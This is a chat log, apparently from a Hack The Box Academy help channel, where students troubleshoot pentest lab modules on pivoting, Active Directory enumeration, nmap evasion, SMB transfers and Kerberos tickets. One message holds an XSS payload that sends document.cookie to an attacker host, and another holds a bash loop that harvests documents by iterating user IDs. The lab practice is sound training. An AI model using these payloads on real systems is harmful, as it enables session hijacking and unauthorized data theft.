I am on the last question where I have to login to the target's email. Every time I try to use telnet to login I keep getting strings saying invalid commands. Since my screenshots will have answers to the other question in them I will have to send them via DM if you need them
I seem to recall unusual results like that. A little googling and I found someone posted about the issue. I also found someone pointing out that NMAP has its own arguments to specify a SOCKS proxy which works better than proxychains.
https://stackoverflow.com/questions/78202269/nmap-scan-returns-all-ports-open-when-ran-with-proxychains-through-a-linux-w
||I should go back and play with it some more myself because when I found that nmap over proxychains was prohibitively slow and gave me weird results I just opted for another route. Sshuttle worked way better for me in that first pivot. I must have gone through that assessment 4 times already with different tools including ligolo... and still feel like I could learn more||
What service
I've only tried using telnet to login from the IMAP and POP servers and both keep giving me invalid credential errors even though I am using the correct password and username
Did you add the domain to the username
the "@domain.htb"? yes I did
Dm the commands
The learning process is one of the essential and most important components that is often overlooked. This module does not teach you techniques to learn but describes the process of learning adapted to the field of information security. You will learn to understand how and when we learn best and increase and improve your learning efficiency greatly.
Is there something I can add to my routers whitelist so I can not send the docker sites through my proxy tunnel? As they are not working with the proxy tunnel enabled.
Without having to add every ip individually
@shut vapor Thank you for sharing this! Even with sshuttle I had similar issues but I guess I should try again :). Aside from that, you are right, indeed it might be worth digging into nmap args as well.
I'm on Active Directory Enumeration & Attacks > ACL Enumeration
Trying to follow along and reverse an ObjectACEType GUID to human-readable form
The "reverse search and mapping" powershell command throws an error I'm not having luck fumbling my way around:
PS C:\> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
An error occurred while enumerating through a collection: The (&ObjectClass -like
'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
+ $Results | Where-Object {$_} | ForEach-Object {
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumera
tor) [], RuntimeException
+ FullyQualifiedErrorId : BadEnumeration
don't use the -like operator use -eq instead
it says in your error you pasted the search filter -like is invalid
anyone else cant start machine in CTPS Academy
You're partially right. It doesn't like -eq either. Something is wrong with referencing "ObjectClass" I think. I completely remove the filter and I get the output that is expected. I found the issue in errata and am very interested in learning how @.dpgg got it working.
#1244914227018203207 message
This might sound like a weird question but is it possible to print a whole module in one go not page by page?
Or like get a pdf for a module
I cant bare to look at my screen rn
I had assumed you assigned $guid already
I did.
it definitely would complain about something else if $guid wasn't assigned. Something wonky with that command for me.
i'd have to see the new error after using -eq
Same error essentially. Completely remove that -filter bit and it works. ¯\_(ツ)_/¯
it's a different error
I put the details in erratum linked earlier too
it says the ControlAccessRight search filter is invalid
try correcting the case as AD searches can be case-sensitive
controlAccessRight
you may also want to simplify it and try running just a basic query to see if basic retrieval is working
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -eq 'controlAccessRight'} -Properties Name,DisplayName,DistinguishedName,rightsGuid
It most certainly is the same error with the exception that one mentions -like and the other -eq:
Uh... let me try with "controlAccessRight" but it's neither here nor there at this point. I don't think that filter is necessary.
No luck fixing case or using the command you offered. Thanks for your insights though. My notes are in errata and maybe @.dpgg can offer some clarity.
welp no idea then. i'm not a programmer by any means.
that command works for me 
wth 💀
he's a real programmer
that's a different command
after -Filter Xre0us has {ObjectClass... while the original command has -Filter {$_.ObjectCLass...
i believe $_. iterates like "for each"
or something like that
ack! You're right. The $_ was from me futzing with it and using the up arrow to grab it out of history.
Here without the $_ though... and then with the filter removed it works.
well glad you guys got it figured out
Anyway... yea. If it's working for XreOuS I'll... uh... I don't know... try again tomorrow with a fresh lab.
And if not I'll just stick with my abridged version
GUYS! @cloud urchin @next bronze (sorry to @ you XreOuS, I see you're DND but wanted to show you)
It fails after importing PowerView!
THATS the problem. 😅 🤪 💀
oh I've heard this from someone else
yeah that's a thing, if you import powerview some objects are modified
makes sense
It even says in the error but I was thinking the command from the lab involved PowerView (because it does earlier).
Well... that's one of those things that wasted a ton of my time that I'll never forget at least.
Thanks for all the help!
I believe powerview has built in queries for this so I guess once you import it you can just use those
i knew it the whole time, i just wanted you to figure it out for yourself 
hi,
```bash
#!/bin/bash
url="http://ip:port"
for i in {1..20}; do
    # double quotes so $i is actually expanded into the POST body
    for link in $(curl -s "$url/documents.php" -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d "uid=$i" | grep -oP "/documents.*?.txt"); do
        # grep output already starts with a slash, so append it to the base URL directly
        wget -q "$url$link"
    done
done
```
something wrong?
lol .
@cloud urchin
?
are you serious
why did you randomly ping me
In order not to give a direct clue to the answer, I will only say that the solution to this question is to read the clue that the question gives you (press hint).
is not randomly lol i was needing help with a module
seemed pretty random. you didn't mention the module/section, or anything for that matter
am i supposed to read your mind?
So funny every time tomrider types 🤣
i can't figure out what you're trying to do either
why?
idk if that's really tomrider
if you search his name there are two accounts, same name same pic different discord name
why are you searching my name just stop here
were you banned or something
i can confirm that this is tomrider
no
Try replacing wget -q with curl -O
i already solve it
He gets angry because I asked him something, then he started looking for my name and accusing me of being previously banned, what a clown
i'm angry?
you're either rude as hell or new to the internet
the real tomrider wouldn't talk to me like that
there are 2?
more than 20 years in the industry and you tell me this, could you please have some respect?
yeah search the name there are 2 accounts.
time to ban one of them
and you can't figure out a simple bash script?
stop making tom look bad
are both of them trolls?
hey does anybody know why i cant type in general
Then ask for the ban, jackass, the best thing he can do is make fun of me because I asked for help with a bash script (the script was fine, there was something in the module that I had understood) if you want to call me stupid, I don't think this is the correct context, I don't think you have the authority with that role to make fun of someone who pays the Academy premium for a question in a module.
you didn't ask for help though you just pasted a script with no context
yes lol i was expecting some obvious bash error that i hadn't yet figured out but it wasnt that, my bad for the lack of context
there's no need for the namecalling
i'm not great at scripting so idk if there's anything wrong with that
i threw it into chatgpt and it said nothing about anything being wrong
just provide more context with your question next time and you'll have a better chance at getting help
Ok, sorry for being rude supernuts and calculacOre
okay buddy with 20 years of experience

@dim wolf Are you sure there was no need for namecalling?
you still didn't say what you needed help with
This dude has mastered trolling
30 mins later...
ngl it's pretty entertaining
Check my recent messages, I already solved it, thanks anyway
im not trolling can you stop?
what did you do with the real tomrider36
no you're gonna steal my account
just dont accuse me of serious things without foundation.
Hi
Oh
Hello! What method can I use to transfer/download files from a Windows rdp session to a Linux attack box if SCP is not working? I am currently stuck on the Pillaging section of the Windows Privilege Escalation module and any help is appreciated!
Tried smb but didnt work either. Ok let me try ftp. Thanks man
are you using xfreerdp
Yup
try adding the drive parameter, /drive:/home/user/desktop
then you can access the shared folder in file explorer
Hmm I can access them on windows when I use xfreerdp but I am trying to download those files to the linux machine so I can use secretsdump.py and get the hash
it shares the folder you select, you can transfer back and forth through that folder..
Anyone for intro to whitebox pentesting skills assessment question 2? Keep getting code injection should not be possible, even without sanitization or validation. Not seeing what’s triggering a code injection vuln
anybody else have or had trouble with installing the instant client for oracle and setting up odat in kali linux either arm64 architecture or amd/intel cpus ? (module : foot printing - Oracle TNS)
Module: Using Crackmapexec -> Spidering and Finding Juicy Information in an SMB Share
Anyone run into this issue when trying to use the spider module in netexec?
ERROR NetBIOSTimeout on target 10.129.204.177: The NETBIOS connection with the remote host timed out. connection.py:172
Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL databases (DB01 or DB02)? I tried a lot of different credentials and I can't connect to either of them
haven't open this module
Currently doing SQLMap Essentials - Skills Assessment.
Not really looking for hints but I cannot seem to find the place where I need to inject.
Did you guys find it manually or with SQLMap?
what ports are open there?
I'm afraid it has nothing to do with which ports are open
hmm interesting
you already have port given by assessment
is there anything related to login or parameter in the request?
No
can you share the screenshot or its web view?
Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL databases (DB01 or DB02)? I tried a lot of different credentials and I can't connect to either of them
Password Attacks > Credential Hunting in Windows
What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)
i got Winscp passwords from Lazagne.exe but when i submit the answer with right Format it didnt work any idea ?
make sure no spaces are in ur answer
if there arent spaces, DM me if u want, to avoid spoilers here
i tried... and also i write the creds to make sure there is no space
try looking for a POST request
Only POST request I can get a hold of are there and I don't think they will do much
try restarting it
looks fine
same issue unfortunately
i think u need to have a ;
at the end of the line in script.js file
I modified it slightly and still same issue
weird
Hello, folks. I was hoping I could please get some help with INTRO TO ASSEMBLY LANGUAGE. I am stuck on Procedures.
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)
I have tried an objdump, disas, and breaks. I am not really sure what the question is asking. When I did the break from _start and stepped through everything, I tried every hex there just to try and pass this; no matter what I tried I cannot seem to pass
i got it to work with just the new image script
try that
just tried, no luck. I think the cookie just isn't being set on the victim machine
like this? "><script>new Image().src='http://ip/index.php?c='+document.cookie;</script>
yes same issue, I get my own cookie just not the victim cookie
this is the last parameter right?
yes I literally copied your payload and even tried removing index.php so it only showed the cookie
I'm using the attackbox 😭
ik, i meant the server
Hi everybody I want to register as a student, but I can't
reach to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
Hey guys, I cleared every question from the Skills Assessment - WordPress exam except the question regarding the unauthenticated file download flag, I used wpscan with my api-key but no matter which vuln am looking at I:
A - Struggle trying to use them all as most of them don't have an online PoC or a (working) module in metasploit
B - Don't find which one is supposed to be the one to exploit as the descriptions aren't really helping me
anyone could give me a heads up please ?
update : Found it
Hey in the citrix breakout section of the windows priv esc module how to get the administrator's flag i cant seem to access any smb shares to get the tools to start a cmd shell
I need help with Password attacks module. Anyone who's done it?
just say what u need help with
what SMB share?
Accessing an smb share from the restricted environment that part you have to do right
To access the tools from the htb student
That part i dont understand
they talked about it in the module, how access to certain folders, in the example that was shown, access to C:\users was forbidden, so a bypass for that is to host an SMB share yourself (using impacket) and then accessing stuff from it
Where in the pwn box itself host a share
use smbserver.py as the module explained
Error. Machine is not starting in Nmap firewall bypass easy lab module
still happening?
Yup. Just loading "Target is spawning"
start a target in another module and try again
here im learning Remote code execution using SMB..Under that SMBExec which is fine which uses smb for rce but why im learning PsExec and atexec ?
different methods of command execution
Guys can I ask if we can save files on Pwnbox?
i dont think you can, each time u restart the instance, everything get reset
I think there's a small persistent storage but I don't use it enough to know where it is
maybe the desktop?
I'll try.. thanks
Hi there, is here anyone who can help with module Intro to Assembly Language, section Procedures.
Question asking - Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes).
I have tried every possible hex value, but no way.
```nasm
global _start
section .data
message db "Fibonacci Sequence:", 0x0a
section .text
_start:
call printMessage ; print intro message
call initFib ; set initial Fib values
call loopFib ; calculate Fib numbers
call Exit ; Exit the program
printMessage:
mov rax, 1 ; rax: syscall number 1
mov rdi, 1 ; rdi: fd 1 for stdout
mov rsi,message ; rsi: pointer to message
mov rdx, 20 ; rdx: print length of 20 bytes
syscall ; call write syscall to the intro message
ret
initFib:
xor rax, rax ; initialize rax to 0
xor rbx, rbx ; initialize rbx to 0
inc rbx ; increment rbx to 1
ret
loopFib:
add rax, rbx ; get the next number
xchg rax, rbx ; swap values
cmp rbx, 10 ; do rbx - 10
js loopFib ; jump if result is <0
ret
Exit:
mov rax, 60 ; rax: syscall number 60 (exit)
mov rdi, 0 ; rdi: exit code 0
syscall
```
gdb would show you the address at the top of the stack, it's below the registers. step through the program and stop at the right place, then look for the address
I'll try. I contact you on progress. Thanks 🙂
Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL databases (DB01 or DB02)? I tried a lot of different credentials and I can't connect to either of them
Hey im doing windows priv esc module the citrix breakout section in there they have a section where we need to share tools using an smb share
I dont understand they say we need to start an smb share from the attack box but there is no tools folder in the pwn box to set up a share
which smbclient i think theres better tools for that though @limpid hemlock
impacket? py-smb (or whatever its called)? someone here would know better.
Yeah, I did that module and he just needs to go back to his notes, giving him hints isn’t worth it
Sometimes you need to go back to another module to understand it
For sure
Anyone knws how to solve it
three separate people have replied to you telling you to read the module again
^ this too
somewhere stuck in Easy lab of OS finding.
Tried -sS, -O, aggressive scan, -T2, -T4, Decoys, -f, RND:10, Specific ports...........Nothing work
but didn't succeed yet. Any guess please
Port 53 is not available
Then you need to find the whitelisted port
This module teaches this issue
I go through this but I'm trying my best.....Now
You just want the OS?
Yup.....there are active firewall and IDS/IPS
Try "nmap <targetip> -sV -sC -O -Pn --disable-arp-ping"
Yep I know 🙂
That lab was tough. But go back to every note
But if you also do --packet-trace you can see what ports have success and what doesn't when using source ports
The part i have a doubt about is the tools are in the first box i rdp into right then from there we visit a site and then get a citrix launch ica file in order to connect to the restricted environment
So once we are in the restricted environment we need to transfer our tools from the machine we rdp'd into initially which has the tools right
These guys have not properly explained how to start an smb server from that initial box we rdp'd into so that we can access that share to get the tools from there
the terminal?
No from where like if i start it from my pwn box i dont have the tools in my pwn box to share right the tools are in the machine u rdp into initially
So to share those tools u need to start a share from that machine we rdp into initially right but
Being at the Windows Privilege Escalation in the path would mean that you have somewhat of a knowledge about the environment and networking
Take a break and a step back, and I'm pretty sure you will be able to answer the question about where to start the smbserver on your own
I asked this module out of scope question in web yesterday, but i think its fairly pedestrian and didnt get an answer, if anyone is willing to answer a simple Q regarding what i think is param pollution (just a yes/no) i would appreciate it. #web message
do you know how to use the which cmd? i already suggested you use that to find the tool you're looking for... man man and man which
╰─ which man ─╯
/usr/bin/man
╭─ ~ ······················································ 1 ✘ 07:44:58 ─╮
╰─ apropos -e awk ─╯
awk (1) - pattern scanning and text processing language
@limpid hemlock you should take note of these 3 cmds, man , apropos, which, they help out considerably
one cant be expected to remember every little thing, linux helps us out a fair bit with that
No the part where im struggling is that i need to start an smb share and in the module they simply started one
I try to start one and it fails
Is there any creds to use to be root so i can try to start one as root
i highly suggest you buy the fundamentals module... i dont see you specifying a password for your cmd substitution $(pwd) these basics are covered pretty exhaustively in the fundamentals course
failing that you may want to run your cmds by chatgpt and have it explain them to you
I tried to su root but didnt have any creds i tried some creds like root and all below
try sudo -i
But that didnt wrk thats why i asked if in this section any creds given to be root cause i dont see one here
That worked bro thanks
Yeah, unless you've been daily-driving Linux as a primary OS since 2008 as I have, the Linux Fundamentals module is an absolute must if you want to get anywhere here.
Read file transfer module , windows file transfer section
what they are doing here is that they start an smbserver to the public, and after that from the windows victim they mount that share and upload/download files from it
$(pwd) is for current directory, which could have been just a .
oh gosh, yes thats right. sorry im just barely waking up
and waking up too early as it is doesnt help either
this
also, try to map the environment on paper or in Draw.io or something. It is really important especially when you get into the AD and pivoting voodoo magic
Password Attacks > Credential Hunting in Linux
- 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer.
i have kira ssh and i got so stuck i know there is passwd and shadow bak but what next, any idea ?
in order to run a server you typically need to assign a port on your machine (think of it like you are running a cupcake shop from your house and you use the windows as a selling point to customers, that window is a port). As for smb servers they are usually assigned to port 465, and Linux by default only allows ports up to 1023 to be assigned by root
so tldr; use sudo
crack the hash from shadow with hashcat? haven't done this module but that seems most logical
i dont have perms to see shadow
sudo -l ?
also
any perms listed in sudoers?
no
bash version vulnerable?
this is more like box strat, sorry i can be of more help
there are two tools and none of them work
so you just know the files exist, you cant actually verify with ls right?
or you can ls /etc/ but cant cat?
hello, I'm in the last step of the footprinting medium lab, I just need to find the password in the msql server but I don't understand how I can get the information out of the DB
run some queries or use the gui tool
Module: Windows Privilege Escalation
I'm going through the sections on user and group privileges. Let's say you're on an assessment in an AD network, do you just have to enumerate the user and group privileges for every user you've compromised on every machine you've compromised to see if you can find a privilege escalation vector? Is there an easier way to go about it?
thats what i'm trying to do (i'm in gui now)
yeah click around then, also look at the hint
I don't recall if bloodhound helps with this enumeration?
pretty much, bloodhound will help with the ad vectors, for local vectors you'd need to do manual checks
So basically for any user that can log on on a machine, you'd have to manually enumerate the privileges?
Also, could you please expand on what you mean by AD vectors?
everything that bloodhound shows
got it, completely forgot about the hint 😅 thanks
yeah, for local PE you'd need to do that
or get a shell in some ways
Ahh, okay. So all the objects you have control over and stuff. Got it.
Got it. Thanks!
Btw let's say you're only able to RDP with domain user A and have credentials of domain user B (unable to RDP). Can you run a powershell window as domain user B after you've RDP using domain user A? If so, how? The runas command?
I mean that depends on what rights user b can do, run as works or you can try to find other ways to get command execution
Thanks
I am running module 35, section 247 of WEB REQUESTS. I am stuck on an exercise and would like some advice on how to proceed.
The question of the exercise is as follows:
The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.
"If I access the web page from the browser, it responds: You must access via cUrl."
http://83.136.251.168:59184/search.php?search=pericolo
If I access via curl, it doesn't return anything. Content-Length: 0.
curl http://83.136.251.168:59184/search.php?search=pericolo -i -H 'Authorization: Basic YWRtaW46YWRtaW4='
I tried to specify the GET method directly.
curl -i -X GET "http://83.136.251.168:59184/search.php?search=pericolo" -H 'Authorization: Basic YWRtaW46YWRtaW4='
Add the Mozilla User-Agent to curl.
curl -i -X GET "http://83.136.251.168:59184/search.php?search=pericolo" -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36'
And it responds that I must use CURL.
Modify the Fetch in the browser and send it to the console with Curl User-Agent, and it responds with an empty page with Content-Length: 0
I don't understand what I'm missing. Could someone kindly give me a push?
can you link? i think ive done this one
what does the exercise say to search for? why are you using pericolo? investigate that and you'll be on your way.
stick with your basic curl that includes auth header
Ok, I solved it, thank you very much. I needed to search for the flag directly on search.
Hello there! Would anyone be able to help me with Command Injection module question Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? please?
I have found the correct answer but the checker disagrees with me 😄
Hey I'm trying to solve citrix breakout from windows priv esc and I'm trying to run bypass uac but can't
can someone help me with the module linux basics with this question: Which kernel version is installed on the system? (Format: 1.22.3)
uname is your friend
Google it bro
i know but it is wrong when i use uname -v
are you SSHed into the target?
i think so
what's the output when you type whoami
htb-ac-1516765
you should be htb-student, so you haven't SSHed in yet
i know how to ssh but where do i get the ip and port
at the bottom of the section where the questions are, there should be a button to spawn the target machine
click it, and once it spawns, you'll get an IP and port to SSH to
Might want to do Linux fundamentals
i do but how?
ssh user@host
thx
Anyone please? I'm pretty sure that answer format is what I'm doing wrong..
Any help
can anybody run this command? i think -sC and --script options cannot be used in a single command
and here we are selecting a table and will only get the data on that table not the whole database
try putting just the injection operator into the answer box
that's what I did. I tried & which worked for me
You should review the nmap documentation on -sC and --script
You should provide more information like things you've tried and the module name and section.
As far as your screenshot is concerned. You can't use a command prompt for PowerShell.
that command is for powershell
not cmd
That was from the citrix breakout section from the windows privesc module
I wanna run the tools I brought into the citrix environment but I'm not able to run them, as Import-Module shows the error
i am getting an error with no usable error output while using both of them together
Read the docs you'll understand why.
Hey guys, I have a question about password cracking. If someone has a little bit of time to explain something to me it would be great ^^
I tried %26 and Background as well but it still doesn't accept it as answer
Can I ping someone for this module and section:
Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Hi, I'm at the very end of the footprinting lab hard but I can't manage to finish it, can someone help me? thank you
Professor messer or network chuck are alright there’s probably others out there too
But may be worth posting in the resources channel as here is for the academy modules help
there's a problem in the Exploiting Web Vulnerabilities in Thick-Client Applications/Attacking Common Applications lab, there's no Open option at the bottom of the window. has anyone encountered this?
I just passed the skills assessment so I clearly have an idea what I'm doing 😄 but still can't beat this part. Would really appreciate someone's help 🙂
Pick one of the 3 options they give
Even though there’s like 5 valid characters to bypass it
lol, thanks. I got it now
hey guys, i am stuck in one of the modules. Login Brute Forcing, section Brute Force Attacks. I try to brute force the pins from 0000-10000, but i always run out of time and dont get the flag. What should i do?
Any help would be amazing
restart the machine and you might get lucky
i restarted the machine multiple times now
from 2 days
Does the pin change every time i restart?
Yo yo
yo
@safe star I found the solution for the cookies not appearing. I was attacking /phishing and not /hijacking hahaha 🤦♂️
I know this is the "module" topic but I did not find a general one for academy. Does anyone else have trouble logging in to HTB Academy? I am getting the message "Cannot log in user because it's already linked with another HTB Account" - unfortunately none of the FAQ and article solutions help :/
Try these: https://youtube.com/playlist?list=PLxbwE86jKRgMpuZuLBivzlM8s2Dk5lXBQ&si=q1UPR2Y7Lg8ZWTPB
https://youtube.com/playlist?list=PLhfrWIlLOoKPc2RecyiM_A9nf3fUU3e6g&si=tMqAZODuQsnxTYjW
I would recommend to disregard NetworkChuck that guy is a waste of time bad jokes and no information
Tried logging in with Google yet?
What google has to do with my HTB account :O?
hey guys, I'm stuck on password cracking. I have to answer this question: when I use linikatz I found this (it's the ticket of the linux01 user, right?). After I export it in my environment and then try to list the smb share I get ACCESS DENIED
If you signed up with a Google email that might have something to do with it if not then idk
some arent valid iirc
expired
but with the klist command you can see that its valid (10/09/2024)
ok did you get julio's flag?
yes i got all of them just not the last one
the one about ticket validation I saw and understood it
ok so the last one you need to find where is the keytab from linikatz
you can find it from the section too~
Do I need a main HTB account to enter CTF’s?
I’d like to enter but I can’t make an account whilst under 18 and I legit turn 18 in two months
How?
Oh Tysm 🙏
Because you need to use -k to use a ticket to sign in
Module: Information Gathering - Web Edition
Section: Virtual Hosts
Could anyone clarify to me what i have to do here exactly
where i am supposed to give this domain for vhosts bruteforce or what else
because when i give just ip in target url it gives me nothing when bruteforcing
wdym?
you're not supposed to use the ip, use the domain
yes
with port yes?
why did you add the port number
i said no port number
eyewitness feels easier to look through
Real quick Idk but why can't I speak in #general I just got here
I didn't put my actual legal name out of safety concerns
just tried it but don't work
i'm probably doing something wrong
why do you keep using julios ticket?
How do I get to This terminal, I just started an hour ago and bootedup my work station but im lost on this step
but its not? i'm using linux01 ticket from the screenshot? no?
yeah but when you used smbclient it was with julios
yeah but with the linux01 ticket, that is what I don't understand, and once I get that listing denied the ticket disappears
are you on pwnbox?
yes, Its telling me to find the linux OS Flavour, idk what that is
Flavour should mean distribution, this is due to Linux being a kernel and a lot of companies/orgs distribute software on top of it. Examples: Debian, Ubuntu, OpenSuse, Arch
so with that in mind you should probably look for such info
no its supposed to be in my work station right? I feel like im missing something
It said I should open a terminal
Start your workstation, then use the integrated terminal to find the Linux OS flavor by running the following command: cat /etc/issue
this exact words
@safe star my bad, I thought that it was first the default principal and after it the ticket cache but it's the opposite ^^
did you click the green square at the top left?
example from my local machine -
yea it gives me a drop down tho
oh nvm i meant the other green square more to the right
ah wait I did not realise you were asking how to start the terminal
yeap all good now that it's resolved 🙂
I followed the command but didnt solve the question
next step is to run the above command from my screenshot
the output should be similar but with different words like Debian ParrotOS or something like that
ok so should I use the words LinuxOS?
I cant send a ss, how do you do that so I can show you?
please
what module is this?
intro to academy?